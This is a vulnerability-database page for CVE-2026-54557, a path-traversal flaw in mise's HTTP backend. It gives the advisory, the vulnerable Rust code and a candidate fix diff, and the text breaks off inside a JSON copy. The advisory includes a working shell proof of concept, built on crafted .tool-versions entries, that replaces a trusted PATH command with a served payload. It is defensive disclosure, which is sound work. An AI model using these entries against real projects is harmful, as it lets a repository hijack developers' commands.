Vulnerability-Lookup

CVE-2026-54557 (GCVE-0-2026-54557)

Vulnerability from cvelistv5 – Published: 2026-06-26 16:47 – Updated: 2026-06-26 17:58

Title

mise HTTP backend uses raw version path for install symlink destination

Summary

mise manages dev tools like node, python, cmake, and terraform. Prior to 2026.6.1, the mise HTTP backend builds its install symlink destination from the raw resolved version string for non-latest versions. Normal tool install paths use the sanitized version pathname, but the HTTP backend's symlink path uses the raw value. On Unix-like systems, if that version is an absolute path, PathBuf::join discards the intended mise installs root. A repository-controlled .tool-versions file can therefore make mise install create a symlink outside the mise install tree. With bin_path, the same issue can place an executable symlink under an attacker-selected absolute prefix, such as a developer-tool prefix that is later added to PATH. This vulnerability is fixed in 2026.6.1.

Severity

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

SSVC

Exploitation: poc Automatable: no Technical Impact: partial

CISA Coordinator (v2.0.3)

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/jdx/mise/security/advisories/G…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
jdx	mise	Affected: < 2026.6.1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-54557",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-06-26T17:57:43.960724Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-06-26T17:58:21.233Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/jdx/mise/security/advisories/GHSA-f94h-j2qg-fxw3"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "mise",
          "vendor": "jdx",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 2026.6.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "mise manages dev tools like node, python, cmake, and terraform. Prior to 2026.6.1, the mise HTTP backend builds its install symlink destination from the raw resolved version string for non-latest versions. Normal tool install paths use the sanitized version pathname, but the HTTP backend\u0027s symlink path uses the raw value. On Unix-like systems, if that version is an absolute path, PathBuf::join discards the intended mise installs root. A repository-controlled .tool-versions file can therefore make mise install create a symlink outside the mise install tree. With bin_path, the same issue can place an executable symlink under an attacker-selected absolute prefix, such as a developer-tool prefix that is later added to PATH. This vulnerability is fixed in 2026.6.1."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "NONE",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-06-26T16:47:29.487Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/jdx/mise/security/advisories/GHSA-f94h-j2qg-fxw3",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/jdx/mise/security/advisories/GHSA-f94h-j2qg-fxw3"
        }
      ],
      "source": {
        "advisory": "GHSA-f94h-j2qg-fxw3",
        "discovery": "UNKNOWN"
      },
      "title": "mise HTTP backend uses raw version path for install symlink destination"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-54557",
    "datePublished": "2026-06-26T16:47:29.487Z",
    "dateReserved": "2026-06-15T19:04:14.456Z",
    "dateUpdated": "2026-06-26T17:58:21.233Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-54557",
      "date": "2026-06-27",
      "epss": "0.00175",
      "percentile": "0.07166"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-54557\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-06-26T18:17:00.553\",\"lastModified\":\"2026-06-26T20:20:22.420\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"mise manages dev tools like node, python, cmake, and terraform. Prior to 2026.6.1, the mise HTTP backend builds its install symlink destination from the raw resolved version string for non-latest versions. Normal tool install paths use the sanitized version pathname, but the HTTP backend\u0027s symlink path uses the raw value. On Unix-like systems, if that version is an absolute path, PathBuf::join discards the intended mise installs root. A repository-controlled .tool-versions file can therefore make mise install create a symlink outside the mise install tree. With bin_path, the same issue can place an executable symlink under an attacker-selected absolute prefix, such as a developer-tool prefix that is later added to PATH. This vulnerability is fixed in 2026.6.1.\"}],\"affected\":[{\"source\":\"security-advisories@github.com\",\"affectedData\":[{\"vendor\":\"jdx\",\"product\":\"mise\",\"versions\":[{\"version\":\"\u003c 2026.6.1\",\"status\":\"affected\"}]}]}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N\",\"baseScore\":5.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":1.8,\"impactScore\":3.6}],\"ssvcV203\":[{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"ssvcData\":{\"timestamp\":\"2026-06-26T17:57:43.960724Z\",\"id\":\"CVE-2026-54557\",\"options\":[{\"exploitation\":\"poc\"},{\"automatable\":\"no\"},{\"technicalImpact\":\"partial\"}],\"role\":\"CISA Coordinator\",\"version\":\"2.0.3\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"references\":[{\"url\":\"https://github.com/jdx/mise/security/advisories/GHSA-f94h-j2qg-fxw3\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/jdx/mise/security/advisories/GHSA-f94h-j2qg-fxw3\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-54557\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-26T17:57:43.960724Z\"}}}], \"references\": [{\"url\": \"https://github.com/jdx/mise/security/advisories/GHSA-f94h-j2qg-fxw3\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-06-26T17:57:23.790Z\"}}], \"cna\": {\"title\": \"mise HTTP backend uses raw version path for install symlink destination\", \"source\": {\"advisory\": \"GHSA-f94h-j2qg-fxw3\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 5.5, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"jdx\", \"product\": \"mise\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2026.6.1\"}]}], \"references\": [{\"url\": \"https://github.com/jdx/mise/security/advisories/GHSA-f94h-j2qg-fxw3\", \"name\": \"https://github.com/jdx/mise/security/advisories/GHSA-f94h-j2qg-fxw3\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"mise manages dev tools like node, python, cmake, and terraform. Prior to 2026.6.1, the mise HTTP backend builds its install symlink destination from the raw resolved version string for non-latest versions. Normal tool install paths use the sanitized version pathname, but the HTTP backend\u0027s symlink path uses the raw value. On Unix-like systems, if that version is an absolute path, PathBuf::join discards the intended mise installs root. A repository-controlled .tool-versions file can therefore make mise install create a symlink outside the mise install tree. With bin_path, the same issue can place an executable symlink under an attacker-selected absolute prefix, such as a developer-tool prefix that is later added to PATH. This vulnerability is fixed in 2026.6.1.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-06-26T16:47:29.487Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-54557\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-06-26T17:58:21.233Z\", \"dateReserved\": \"2026-06-15T19:04:14.456Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-06-26T16:47:29.487Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-F94H-J2QG-FXW3

Vulnerability from github – Published: 2026-06-23 18:13 – Updated: 2026-06-23 18:13

Summary

mise HTTP backend uses raw version path for install symlink destination

Details

Summary

The mise HTTP backend builds its install symlink destination from the raw resolved version string for non-latest versions. Normal tool install paths use the sanitized version pathname, but the HTTP backend's symlink path uses the raw value. On Unix-like systems, if that version is an absolute path, PathBuf::join discards the intended mise installs root.

A repository-controlled .tool-versions file can therefore make mise install create a symlink outside the mise install tree. With bin_path, the same issue can place an executable symlink under an attacker-selected absolute prefix, such as a developer-tool prefix that is later added to PATH.

The reproducer below also models a CI/developer workflow where a later step executes a preexisting trusted command from a user-local PATH prefix. The absolute-version HTTP entry replaces that command with a symlink to downloaded HTTP content. A non-absolute version control does not replace the trusted PATH command.

Affected Code

In src/backend/http.rs, create_install_symlink() derives the destination path from raw tv.version:

let version_name = if tv.version == "latest" || tv.version.is_empty() {
    &cache_key[..7.min(cache_key.len())]
} else {
    &tv.version
};

let install_path = tv.ba().installs_path.join(version_name);

ToolVersion::tv_pathname() already sanitizes : and / for filesystem version directory names, but this HTTP backend path does not use it.

Impact

Proven:

Outside-root symlink creation from a repository-controlled .tool-versions entry.
Executable symlink materialization under an attacker-selected absolute prefix when bin_path is configured.
The executable symlink can be run if that prefix's bin directory is on PATH.
Replacement of a preexisting command in a trusted PATH prefix in a local workflow-chain model, followed by execution of the replaced command by name.

Not claimed:

mise install does not automatically execute the placed binary in the reproducer.
Windows drive-letter absolute paths are not claimed; the demonstrated impact is Unix-like path behavior.
Credential theft is not claimed.

Why This Crosses A Boundary

.tool-versions is an asdf-compatible project file and is parsed without the mise.toml trust gate used for configuration features that can execute code or affect the environment. Even if a project can choose tools to install, an install operation should keep HTTP backend materialization under the selected mise install/cache roots unless the user explicitly performs a trusted link or path operation.

The HTTP backend documentation describes HTTP tool installations as symlinks under the mise installs directory, for example:

$MISE_DATA_DIR/installs/http-my-tool/1.0.0 -> $MISE_CACHE_DIR/http-tarballs/...

The observed behavior instead allows the project version string to choose an absolute install destination.

Reproduction

The script below performs three local checks:

It creates a .tool-versions entry whose HTTP backend version is an absolute path, then confirms that mise creates a symlink at that outside path.
It creates a second HTTP backend entry with bin_path=bin and confirms that mise places an executable symlink under an attacker-selected absolute prefix and that the symlink is executable when the prefix's bin directory is on PATH.
It creates a preexisting trusted command in a user-local PATH prefix, runs mise install from a project .tool-versions file, and confirms the later trusted command execution is replaced only in the absolute-version case. A non-absolute version control leaves the preexisting command in place.

The script uses a loopback HTTP server and temporary directories only.

#!/bin/sh
set -eu

if ! command -v mise >/dev/null 2>&1; then
  echo "mise must be on PATH" >&2
  exit 1
fi

if ! command -v python3 >/dev/null 2>&1; then
  echo "python3 must be on PATH for the loopback HTTP server" >&2
  exit 1
fi

ROOT="$(mktemp -d)"
OUT="$ROOT/out"
DATA="$ROOT/data"
CACHE="$ROOT/cache"
STATE="$ROOT/state"
CONFIG="$ROOT/config"
WWW="$ROOT/www"

cleanup() {
  if [ -n "${SERVER_PID:-}" ]; then
    kill "$SERVER_PID" 2>/dev/null || true
  fi
  rm -rf "$ROOT"
}
trap cleanup EXIT

mkdir -p "$OUT" "$DATA" "$CACHE" "$STATE" "$CONFIG" "$WWW"

cat > "$WWW/payload" <<'PAYLOAD'
#!/bin/sh
if [ -n "${CHAIN_MARKER:-}" ]; then
  echo ATTACKER_CONTROLLED_TRUSTED_COMMAND > "$CHAIN_MARKER"
else
  echo MISE_HTTP_ABSOLUTE_VERSION_EXECUTED > "$MISE_HTTP_ABSOLUTE_VERSION_MARKER"
fi
PAYLOAD
chmod +x "$WWW/payload"

(
  cd "$WWW"
  python3 -m http.server 54321 --bind 127.0.0.1 >/dev/null 2>&1
) &
SERVER_PID=$!
sleep 1

PROJECT1="$ROOT/project-host-write"
mkdir -p "$PROJECT1"
cat > "$PROJECT1/.tool-versions" <<EOF1
http:absolute-version-one[url=http://127.0.0.1:54321/payload,bin=owned-one] $OUT/owned-link
EOF1

(
  cd "$PROJECT1"
  MISE_DATA_DIR="$DATA" \
  MISE_CACHE_DIR="$CACHE" \
  MISE_STATE_DIR="$STATE" \
  MISE_CONFIG_DIR="$CONFIG" \
  MISE_YES=1 \
  mise install --yes
)

if [ ! -L "$OUT/owned-link" ]; then
  echo "FAIL: outside symlink was not created" >&2
  exit 1
fi

PROJECT2="$ROOT/project-bin-path"
mkdir -p "$PROJECT2"
cat > "$PROJECT2/.tool-versions" <<EOF2
http:absolute-version-two[url=http://127.0.0.1:54321/payload,bin=ownedcmd,bin_path=bin] $OUT/selected-prefix
EOF2

rm -rf "$DATA" "$CACHE" "$STATE" "$CONFIG"
mkdir -p "$DATA" "$CACHE" "$STATE" "$CONFIG"

(
  cd "$PROJECT2"
  MISE_DATA_DIR="$DATA" \
  MISE_CACHE_DIR="$CACHE" \
  MISE_STATE_DIR="$STATE" \
  MISE_CONFIG_DIR="$CONFIG" \
  MISE_YES=1 \
  mise install --yes
)

if [ ! -L "$OUT/selected-prefix/bin/ownedcmd" ]; then
  echo "FAIL: executable symlink was not created under selected prefix" >&2
  exit 1
fi

MARKER="$OUT/executed-marker"
MISE_HTTP_ABSOLUTE_VERSION_MARKER="$MARKER" \
PATH="$OUT/selected-prefix/bin:$PATH" \
ownedcmd

if ! grep -q MISE_HTTP_ABSOLUTE_VERSION_EXECUTED "$MARKER"; then
  echo "FAIL: executable symlink did not run" >&2
  exit 1
fi

echo "VULNERABLE_BEHAVIOR_CONFIRMED"
echo "outside symlink: $OUT/owned-link -> $(readlink "$OUT/owned-link")"
echo "path executable: $OUT/selected-prefix/bin/ownedcmd -> $(readlink "$OUT/selected-prefix/bin/ownedcmd")"

run_path_chain_case() {
  case_name="$1"
  version="$2"
  expected="$3"

  CASE_ROOT="$ROOT/$case_name"
  HOME_DIR="$CASE_ROOT/home"
  CASE_DATA="$CASE_ROOT/data"
  CASE_CACHE="$CASE_ROOT/cache"
  CASE_STATE="$CASE_ROOT/state"
  CASE_CONFIG="$CASE_ROOT/config"
  CASE_PROJECT="$CASE_ROOT/project"
  CASE_MARKER="$CASE_ROOT/marker"

  if [ "$version" = "__HOME_LOCAL_PREFIX__" ]; then
    version="$HOME_DIR/.local"
  fi

  mkdir -p "$HOME_DIR/.local/bin" "$CASE_DATA" "$CASE_CACHE" "$CASE_STATE" "$CASE_CONFIG" "$CASE_PROJECT"
  cat > "$HOME_DIR/.local/bin/trustedcmd" <<'SAFE'
#!/bin/sh
echo SAFE_PREEXISTING_TRUSTED_COMMAND > "$CHAIN_MARKER"
SAFE
  chmod +x "$HOME_DIR/.local/bin/trustedcmd"

  cat > "$CASE_PROJECT/.tool-versions" <<EOF3
http:path-chain[url=http://127.0.0.1:54321/payload,bin=trustedcmd,bin_path=bin] $version
EOF3

  (
    cd "$CASE_PROJECT"
    HOME="$HOME_DIR" \
    MISE_DATA_DIR="$CASE_DATA" \
    MISE_CACHE_DIR="$CASE_CACHE" \
    MISE_STATE_DIR="$CASE_STATE" \
    MISE_CONFIG_DIR="$CASE_CONFIG" \
    MISE_YES=1 \
    mise install --yes
  )

  CHAIN_MARKER="$CASE_MARKER" \
  PATH="$HOME_DIR/.local/bin:$PATH" \
  trustedcmd

  observed="$(cat "$CASE_MARKER")"
  if [ "$observed" != "$expected" ]; then
    echo "FAIL: $case_name expected $expected but saw $observed" >&2
    exit 1
  fi

  if [ "$case_name" = "path-chain-vulnerable" ] && [ ! -L "$HOME_DIR/.local/bin/trustedcmd" ]; then
    echo "FAIL: path-chain case did not replace trustedcmd with a symlink" >&2
    exit 1
  fi
}

run_path_chain_case path-chain-vulnerable "__HOME_LOCAL_PREFIX__" ATTACKER_CONTROLLED_TRUSTED_COMMAND
run_path_chain_case path-chain-control "1.0.0" SAFE_PREEXISTING_TRUSTED_COMMAND

echo "PATH_CHAIN_CONFIRMED"

Expected vulnerable markers:

VULNERABLE_BEHAVIOR_CONFIRMED
PATH_CHAIN_CONFIRMED

Candidate Fix

Use tv.tv_pathname() for non-latest HTTP install symlink names, preserving the current content-addressed behavior for latest or empty versions.

diff --git a/src/backend/http.rs b/src/backend/http.rs
index 4e4e972..18cf8a1 100644
--- a/src/backend/http.rs
+++ b/src/backend/http.rs
@@ -518,12 +518,12 @@ impl HttpBackend {

         // Determine version name for install path
         let version_name = if tv.version == "latest" || tv.version.is_empty() {
-            &cache_key[..7.min(cache_key.len())] // Content-based versioning
+            cache_key[..7.min(cache_key.len())].to_string() // Content-based versioning
         } else {
-            &tv.version
+            tv.tv_pathname()
         };

-        let install_path = tv.ba().installs_path.join(version_name);
+        let install_path = tv.ba().installs_path.join(&version_name);

         // Clean up existing install
         if install_path.exists() {
@@ -839,3 +839,51 @@ impl Backend for HttpBackend {
         }
     }
 }
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use crate::cli::args::{BackendArg, BackendResolution};
+    use crate::toolset::{ToolRequest, ToolSource, ToolVersionOptions};
+
+    fn http_test_tv(version: &str) -> ToolVersion {
+        let backend = Arc::new(BackendArg::new_raw(
+            "http-absolute-version".to_string(),
+            Some("http:absolute-version".to_string()),
+            "absolute-version".to_string(),
+            None,
+            BackendResolution::new(true),
+        ));
+        let request = ToolRequest::Version {
+            backend,
+            version: version.to_string(),
+            options: ToolVersionOptions::default(),
+            source: ToolSource::Argument,
+        };
+        ToolVersion::new(request, version.to_string())
+    }
+
+    #[test]
+    fn install_symlink_path_uses_sanitized_version_pathname() {
+        let tv = http_test_tv("/outside-root/mise-http-version-out/selected-prefix");
+
+        assert_eq!(
+            tv.tv_pathname(),
+            "-outside-root-mise-http-version-out-selected-prefix"
+        );
+        assert!(!Path::new(&tv.tv_pathname()).is_absolute());
+    }
+
+    #[test]
+    fn latest_install_symlink_still_uses_content_version() {
+        let tv = http_test_tv("latest");
+        let cache_key = "abcdef123456";
+        let version_name = if tv.version == "latest" || tv.version.is_empty() {
+            cache_key[..7.min(cache_key.len())].to_string()
+        } else {
+            tv.tv_pathname()
+        };
+
+        assert_eq!(version_name, "abcdef1");
+    }
+}

Reporter: JUNYI LIU

Severity

5.5 (Medium)


                  
                    CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2026.5.16"
      },
      "package": {
        "ecosystem": "crates.io",
        "name": "mise"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2026.6.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-54557"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-23T18:13:53Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe mise HTTP backend builds its install symlink destination from the raw resolved version string for non-latest versions. Normal tool install paths use the sanitized version pathname, but the HTTP backend\u0027s symlink path uses the raw value. On Unix-like systems, if that version is an absolute path, `PathBuf::join` discards the intended mise installs root.\n\nA repository-controlled `.tool-versions` file can therefore make `mise install` create a symlink outside the mise install tree. With `bin_path`, the same issue can place an executable symlink under an attacker-selected absolute prefix, such as a developer-tool prefix that is later added to `PATH`.\n\nThe reproducer below also models a CI/developer workflow where a later step executes a preexisting trusted command from a user-local `PATH` prefix. The absolute-version HTTP entry replaces that command with a symlink to downloaded HTTP content. A non-absolute version control does not replace the trusted `PATH` command.\n\n## Affected Code\n\nIn `src/backend/http.rs`, `create_install_symlink()` derives the destination path from raw `tv.version`:\n\n```rust\nlet version_name = if tv.version == \"latest\" || tv.version.is_empty() {\n    \u0026cache_key[..7.min(cache_key.len())]\n} else {\n    \u0026tv.version\n};\n\nlet install_path = tv.ba().installs_path.join(version_name);\n```\n\n`ToolVersion::tv_pathname()` already sanitizes `:` and `/` for filesystem version directory names, but this HTTP backend path does not use it.\n\n## Impact\n\nProven:\n\n- Outside-root symlink creation from a repository-controlled `.tool-versions` entry.\n- Executable symlink materialization under an attacker-selected absolute prefix when `bin_path` is configured.\n- The executable symlink can be run if that prefix\u0027s `bin` directory is on `PATH`.\n- Replacement of a preexisting command in a trusted `PATH` prefix in a local workflow-chain model, followed by execution of the replaced command by name.\n\nNot claimed:\n\n- `mise install` does not automatically execute the placed binary in the reproducer.\n- Windows drive-letter absolute paths are not claimed; the demonstrated impact is Unix-like path behavior.\n- Credential theft is not claimed.\n\n## Why This Crosses A Boundary\n\n`.tool-versions` is an asdf-compatible project file and is parsed without the `mise.toml` trust gate used for configuration features that can execute code or affect the environment. Even if a project can choose tools to install, an install operation should keep HTTP backend materialization under the selected mise install/cache roots unless the user explicitly performs a trusted link or path operation.\n\nThe HTTP backend documentation describes HTTP tool installations as symlinks under the mise installs directory, for example:\n\n```text\n$MISE_DATA_DIR/installs/http-my-tool/1.0.0 -\u003e $MISE_CACHE_DIR/http-tarballs/...\n```\n\nThe observed behavior instead allows the project version string to choose an absolute install destination.\n\n## Reproduction\n\nThe script below performs three local checks:\n\n1. It creates a `.tool-versions` entry whose HTTP backend version is an absolute path, then confirms that mise creates a symlink at that outside path.\n2. It creates a second HTTP backend entry with `bin_path=bin` and confirms that mise places an executable symlink under an attacker-selected absolute prefix and that the symlink is executable when the prefix\u0027s `bin` directory is on `PATH`.\n3. It creates a preexisting trusted command in a user-local `PATH` prefix, runs `mise install` from a project `.tool-versions` file, and confirms the later trusted command execution is replaced only in the absolute-version case. A non-absolute version control leaves the preexisting command in place.\n\nThe script uses a loopback HTTP server and temporary directories only.\n\n```sh\n#!/bin/sh\nset -eu\n\nif ! command -v mise \u003e/dev/null 2\u003e\u00261; then\n  echo \"mise must be on PATH\" \u003e\u00262\n  exit 1\nfi\n\nif ! command -v python3 \u003e/dev/null 2\u003e\u00261; then\n  echo \"python3 must be on PATH for the loopback HTTP server\" \u003e\u00262\n  exit 1\nfi\n\nROOT=\"$(mktemp -d)\"\nOUT=\"$ROOT/out\"\nDATA=\"$ROOT/data\"\nCACHE=\"$ROOT/cache\"\nSTATE=\"$ROOT/state\"\nCONFIG=\"$ROOT/config\"\nWWW=\"$ROOT/www\"\n\ncleanup() {\n  if [ -n \"${SERVER_PID:-}\" ]; then\n    kill \"$SERVER_PID\" 2\u003e/dev/null || true\n  fi\n  rm -rf \"$ROOT\"\n}\ntrap cleanup EXIT\n\nmkdir -p \"$OUT\" \"$DATA\" \"$CACHE\" \"$STATE\" \"$CONFIG\" \"$WWW\"\n\ncat \u003e \"$WWW/payload\" \u003c\u003c\u0027PAYLOAD\u0027\n#!/bin/sh\nif [ -n \"${CHAIN_MARKER:-}\" ]; then\n  echo ATTACKER_CONTROLLED_TRUSTED_COMMAND \u003e \"$CHAIN_MARKER\"\nelse\n  echo MISE_HTTP_ABSOLUTE_VERSION_EXECUTED \u003e \"$MISE_HTTP_ABSOLUTE_VERSION_MARKER\"\nfi\nPAYLOAD\nchmod +x \"$WWW/payload\"\n\n(\n  cd \"$WWW\"\n  python3 -m http.server 54321 --bind 127.0.0.1 \u003e/dev/null 2\u003e\u00261\n) \u0026\nSERVER_PID=$!\nsleep 1\n\nPROJECT1=\"$ROOT/project-host-write\"\nmkdir -p \"$PROJECT1\"\ncat \u003e \"$PROJECT1/.tool-versions\" \u003c\u003cEOF1\nhttp:absolute-version-one[url=http://127.0.0.1:54321/payload,bin=owned-one] $OUT/owned-link\nEOF1\n\n(\n  cd \"$PROJECT1\"\n  MISE_DATA_DIR=\"$DATA\" \\\n  MISE_CACHE_DIR=\"$CACHE\" \\\n  MISE_STATE_DIR=\"$STATE\" \\\n  MISE_CONFIG_DIR=\"$CONFIG\" \\\n  MISE_YES=1 \\\n  mise install --yes\n)\n\nif [ ! -L \"$OUT/owned-link\" ]; then\n  echo \"FAIL: outside symlink was not created\" \u003e\u00262\n  exit 1\nfi\n\nPROJECT2=\"$ROOT/project-bin-path\"\nmkdir -p \"$PROJECT2\"\ncat \u003e \"$PROJECT2/.tool-versions\" \u003c\u003cEOF2\nhttp:absolute-version-two[url=http://127.0.0.1:54321/payload,bin=ownedcmd,bin_path=bin] $OUT/selected-prefix\nEOF2\n\nrm -rf \"$DATA\" \"$CACHE\" \"$STATE\" \"$CONFIG\"\nmkdir -p \"$DATA\" \"$CACHE\" \"$STATE\" \"$CONFIG\"\n\n(\n  cd \"$PROJECT2\"\n  MISE_DATA_DIR=\"$DATA\" \\\n  MISE_CACHE_DIR=\"$CACHE\" \\\n  MISE_STATE_DIR=\"$STATE\" \\\n  MISE_CONFIG_DIR=\"$CONFIG\" \\\n  MISE_YES=1 \\\n  mise install --yes\n)\n\nif [ ! -L \"$OUT/selected-prefix/bin/ownedcmd\" ]; then\n  echo \"FAIL: executable symlink was not created under selected prefix\" \u003e\u00262\n  exit 1\nfi\n\nMARKER=\"$OUT/executed-marker\"\nMISE_HTTP_ABSOLUTE_VERSION_MARKER=\"$MARKER\" \\\nPATH=\"$OUT/selected-prefix/bin:$PATH\" \\\nownedcmd\n\nif ! grep -q MISE_HTTP_ABSOLUTE_VERSION_EXECUTED \"$MARKER\"; then\n  echo \"FAIL: executable symlink did not run\" \u003e\u00262\n  exit 1\nfi\n\necho \"VULNERABLE_BEHAVIOR_CONFIRMED\"\necho \"outside symlink: $OUT/owned-link -\u003e $(readlink \"$OUT/owned-link\")\"\necho \"path executable: $OUT/selected-prefix/bin/ownedcmd -\u003e $(readlink \"$OUT/selected-prefix/bin/ownedcmd\")\"\n\nrun_path_chain_case() {\n  case_name=\"$1\"\n  version=\"$2\"\n  expected=\"$3\"\n\n  CASE_ROOT=\"$ROOT/$case_name\"\n  HOME_DIR=\"$CASE_ROOT/home\"\n  CASE_DATA=\"$CASE_ROOT/data\"\n  CASE_CACHE=\"$CASE_ROOT/cache\"\n  CASE_STATE=\"$CASE_ROOT/state\"\n  CASE_CONFIG=\"$CASE_ROOT/config\"\n  CASE_PROJECT=\"$CASE_ROOT/project\"\n  CASE_MARKER=\"$CASE_ROOT/marker\"\n\n  if [ \"$version\" = \"__HOME_LOCAL_PREFIX__\" ]; then\n    version=\"$HOME_DIR/.local\"\n  fi\n\n  mkdir -p \"$HOME_DIR/.local/bin\" \"$CASE_DATA\" \"$CASE_CACHE\" \"$CASE_STATE\" \"$CASE_CONFIG\" \"$CASE_PROJECT\"\n  cat \u003e \"$HOME_DIR/.local/bin/trustedcmd\" \u003c\u003c\u0027SAFE\u0027\n#!/bin/sh\necho SAFE_PREEXISTING_TRUSTED_COMMAND \u003e \"$CHAIN_MARKER\"\nSAFE\n  chmod +x \"$HOME_DIR/.local/bin/trustedcmd\"\n\n  cat \u003e \"$CASE_PROJECT/.tool-versions\" \u003c\u003cEOF3\nhttp:path-chain[url=http://127.0.0.1:54321/payload,bin=trustedcmd,bin_path=bin] $version\nEOF3\n\n  (\n    cd \"$CASE_PROJECT\"\n    HOME=\"$HOME_DIR\" \\\n    MISE_DATA_DIR=\"$CASE_DATA\" \\\n    